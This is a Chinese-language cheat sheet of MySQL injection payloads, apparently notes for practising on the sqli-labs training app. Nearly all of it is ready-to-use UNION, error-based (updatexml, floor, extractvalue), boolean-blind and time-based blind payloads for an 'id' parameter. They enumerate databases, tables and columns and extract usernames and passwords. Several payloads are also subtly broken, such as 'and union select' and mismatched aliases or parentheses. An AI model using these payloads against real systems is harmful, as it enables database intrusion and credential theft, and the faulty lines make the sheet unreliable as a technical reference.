mysql数据库常用函数:
system_user()系统用户名
users()用户名
current_user()当前用户名
session_user()连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
@@datadir 读取数据库路径
@@basedir MYSQL安装路径
@@version_compile_os 操作系统
concat(str1,str2,str3),返回str1+str2+str3;当有一个字符串为NULL时,即返回NULL
concat_ws(separator,str1,str2,str3),返回str1+separator+str2+separator+str3
group_concat(str1,str2,str3),返回str1+str2+str3;
ascii(a)将a转换成其ASCII值
ord(a)将a转换成其ASCII值
left(a,b)从左往右截取字符串a的前b个字符
substr(a,b,c)从b位置开始,截取字符串a的c长度
mid(a,b,c)从位置b开始,截取a字符串的c位
regexp、like语句UNION SELECT
union用于连接两个或多个select语句,在注入时需要使前一个select语句为错才能将第二个select语句作为最后输出,即id=-1
查询当前数据库:
id=-1' and union select 1,2,database()--+查询所有数据库:
id=-1' and union select 1,2,group_concat(schema_name) from information_schema.schemata --+查询表名:
id=-1' and union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+查询列名:
id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+查询字段值:
id=-1' union select 1,2,group_concat(id,username,password) from users--+基于报错注入
updatexml报错注入
updatexml(XML_document,XPath_String,new_value)
获取数据库名、版本信息:
id=1' and updatexml(1,concat(0x23,database(),0x23,version(),0x23),1)--+获取表名:
id=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x23),1)--+获取列名:
id=1' and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x23),1)--+获取表users()中的用户名和密码:
id=1' and updatexml(1,concat(0x23,(select group_concat(username,0x23,password) from security.users)),1)--+floor报错注入
floor(rand(0)*2)
爆库:
id=1' and (select 1 from (select count(*),concat(0x23,database(),0x23,floor(rand(0)*2)) as x from information_schema.tables group by x) as y)--+爆库
或:
id=1' union select 1 from (select count(*),concat(0x23,database(),0x23,floor(rand(0)*2)) as x from information_schema.tables group by x) as y--+
或:
id=1' union select 1,2,count(*) from information_schema.columns group by concat(version(),floor(rand(0)*2)) --+爆表:
id=1' and (select 1 from (select count(*),concat(0x23,(select concat(table_name) from information_schema.tables where table_schema=database() limit 3,1),0x23,floor(rand(0)*2)) as x from information_schema.tables group by y) as a) --+爆列名:
id=1' and (select 1 from (select count(*),concat(0x23,(select concat(column_name) from information_schema.columns where table_name='users' limit 5,1),0x23,floor(rand(0)*2)) as x from information_schema.tables group by x) as a)--+爆字段值:
id=1' and (select 1 from (select count(*),concat(0x23,(select concat(username,':',password) from security.users limit 0,1),0x23,floor(rand(0)*2)) as x from information_schema.tables group by x) as a)--+extractvalue报错注入
extractvalue(xml_frag, xpath_expr)
爆库:
id=1' and extractvalue(1,concat_ws(0x23,user(),version(),database(),@@version_compile_os))--+爆表:
id=1' and extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+爆列名:
id=1' and extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_name='users')))--+爆字段:
id=1' and extractvalue(1,(select group_concat(username,':',password) from users))--+盲注
基于布尔的盲注
ascii()返回指定字符串最左侧字符的ascii值
count()计算结果集的数量
length()返回指定字符串的长度
substr(str,pos,len)
substring(str,pos,len)返回截取的子字符串判断数据库名的长度
id=1' and (length(database())>9) --+
id=1' and (length(database())=9) --+
id=-1' and (length(database())>0) --+猜数据库名
id=1' and (left(database(),1)='s')--+从左到右截取一个字符,s对应的ascii值为115
id=1' and ascii(substr(database(),1,1))=115 --+
id=1' and ascii(substr(database(),1,1))<115 --+可以使用‘<’,‘>’来判断
id=1' and (left(database(),2)='se')--+从左到右截取两个字符猜当前数据库中表的数量
id=1' and 4=(select count(table_name) from information_schema.tables where table_schema=database())--+
id=1' and 4=(select count(table_name) from information_schema.tables where table_schema='security')--+猜当前数据库中表名的长度
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),7,1))--+表名的长度即是7-1=6位,这里的limit是取的第一个数据库
id=1' and (length((select table_name from information_schema.tables where table_schema='security' limit 0,1)=6))--+
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),7,1))--+ 这里的limit是取的第二个数据库
id=1' and (length((select table_name from information_schema.tables where table_schema='security' limit 1,1)=8))--+逐个猜解表名
格式为:ascii(substr(xxx limit null,1),null,1) ,对递增依次猜解
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101 --+对数据库中的第一个表的第一个字符进行ascii的猜解
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109 --+对数据库中的第一个表的第二个字符进行ascii的猜解猜表中列的数量
id=1' and (select count(column_name) from information_schema.columns where table_name='users')=20 --+猜列名的长度
id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)) --+
id=1' and length((select column_name from information_schema.columns where table_name='users' limit 0,1))=2 --+猜解列名
id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105 --+猜字段数量
id=1' and (select count(username) from security.users)=13 --+猜字段长度
id=1' and length((select username from security.users limit 0,1))=4 --+dump字段的值
id=1' and ascii(substr((select username from security.users limit 0,1),1,1))=67--+
id=1' and ascii(substr((select concat(username,':',password) from security.users limit 0,1),1,1))=68--+基于时间的盲注
在获取表名、列名以及具体信息时,方法与布尔盲注相同,都是逐个猜解
if(1,2,3):如果1为True,则执行2,否则执行3
sleep(x):执行延迟x秒
ascii(char):将char转换为对应的ascii码
substr(string,start,len):从string的start位开始截取len个字符
Benchmark(x,1):执行表达式1,x次(会消耗CPU,慎用)查看信息
id=1' and if(ascii(substr(user(),1,1))=114,sleep(3),1)查看用户名
id=1' and if(ascii(substr(database(),1,1))=114,sleep(3),1)查看数据库
id=1' and if(ascii(substr(version(),1,1))=114,sleep(3),1)查看数据库版本爆表名
id=-1' and union select if(ascii(substr(table_name,1,1))>97,sleep(5),1),2,3 from information_schema.tables where table_schema = database() limit 0,1爆列名
id=-1' and union select if(ascii(substr(column_name,1,1))=105,sleep(5),1),2,3 from information_schema.columns where table_name = 'admin' limit 0,1爆数据
id=-1' and union select if(ascii(substr(user,1,1))=97,sleep(5),1),2,3 from admin limit 0,1